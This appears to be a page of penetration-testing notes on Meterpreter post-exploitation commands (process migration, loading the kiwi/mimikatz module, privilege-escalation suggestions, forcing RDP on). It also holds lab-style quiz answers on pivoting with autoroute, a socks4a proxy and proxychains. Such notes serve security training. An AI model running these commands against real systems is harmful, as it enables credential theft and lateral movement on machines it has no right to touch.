Meterpreter

migrate
getuid
sysinfo
load kiwi # mimikatz
getprivs
upload
run
shell
run post/windows/gather/checkvm # are we in a VM
run post/multi/recon/local_exploit_suggester # to elevate priv
run post/windows/manage/enable_rdp # force RDP, if admin

# Pivoting

What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.

run autoroute -s 172.18.1.0 -n 255.255.255.0

Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command search server/socks4a. What is the full path to the socks4a auxiliary module?

auxiliary/server/socks4a

Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains?

proxychains

PreviousPrivilege Escalation NextSpawning a TTY Shell

Last updated 4 years ago